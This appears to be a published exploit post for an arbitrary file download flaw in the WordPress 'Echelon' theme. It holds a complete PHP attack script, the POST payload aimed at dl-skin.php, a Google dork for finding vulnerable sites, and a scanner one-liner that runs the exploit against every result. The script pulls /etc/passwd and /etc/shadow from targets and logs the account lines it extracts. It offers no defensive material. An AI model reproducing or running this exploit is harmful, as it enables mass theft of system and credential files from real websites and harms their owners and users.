*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL *Description:* This exploit allows attacker to download any writable file from the server *Usage info:* Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly File download /etc/passwd & /etc/shadow Failure consists of exploring a parameter $ _POST file /wp-content/themes/echelon/lib/scripts/dl-skin.php The following fields are exploited for Arbitrary File Download *POST:* _mysite_download_skin={$config['file']}&submit=Download ex: _mysite_download_skin=/etc/passwd&submit=Download *Exploit:* <?php #=============================================================================== # NAME: Wordpress A.F.D Theme Echelon # TIPE: Arbitrary File Download # Google DORK: inurl:/wp-content/themes/echelon # Vendor: www.wordpress.org # Tested on: Linux # EXECUTE: php exploit.php www.alvo.com.br # OUTPUT: EXPLOIT_WPAFD_Echelon.txt # AUTOR: Cleiton Pinheiro # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # GIT: https://github.com/googleinurl # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA # # ------------------------------------------------------------------------------ # Comand Exec Scanner INURLBR: # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_" # ------------------------------------------------------------------------------ # Download Scanner INURLBR: # https://github.com/googleinurl/SCANNER-INURLBR #=============================================================================== error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http:// {$argv[1]}"; !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br') : NULL; $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n"; $config['alvo'] = $alvo_[0][0]; $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php"; function __plus() { ob_flush(); flush(); } function __convertUrlQuery($query) { $queryParts = explode('&', $query); $params = array(); foreach ($queryParts as $param) { $item = explode('=', $param); $params[$item[0]] = urlencode($item[1]); } return $params; } function __request_info($curl, $config) { $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download"); foreach ($postDados as $campo => $valor) { $postDados_format .= $campo . '=' . ($valor) . '&'; } $postDados_format = rtrim($postDados_format, '&'); curl_setopt($curl, CURLOPT_POST, count($postDados)); curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/' . rand(1, 500) . '.31'); curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . $config['exploit']); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $corpo = curl_exec($curl); $server = curl_getinfo($curl); $status = NULL; preg_match_all('(HTTP.*)', $corpo, $status['http']); preg_match_all('(Server:.*)', $corpo, $status['server']); preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['Content-Disposition'][0][0]}")); curl_close($curl); unset($curl); return isset($corpo) ? array('corpo' => $corpo, 'server' => $server, 'info' => $info) : FALSE; } function main($config,$rest) { __plus(); print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n"; $res.=$config['line'] . "\n"; foreach ($_final as $value) { $res.="0x " . date("h:m:s") . " [VALUE]: $value\n"; } $res.=$config['line']; __plus(); file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; } else { print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n"; } } print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; $config['file'] = '/etc/passwd'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); print $line; print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n"; print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n"; main($config,$rest); __plus(); $config['file'] = '/etc/shadow'; $rest = __request_info($objcurl = curl_init(), $config); __plus(); main($config,$rest); __plus();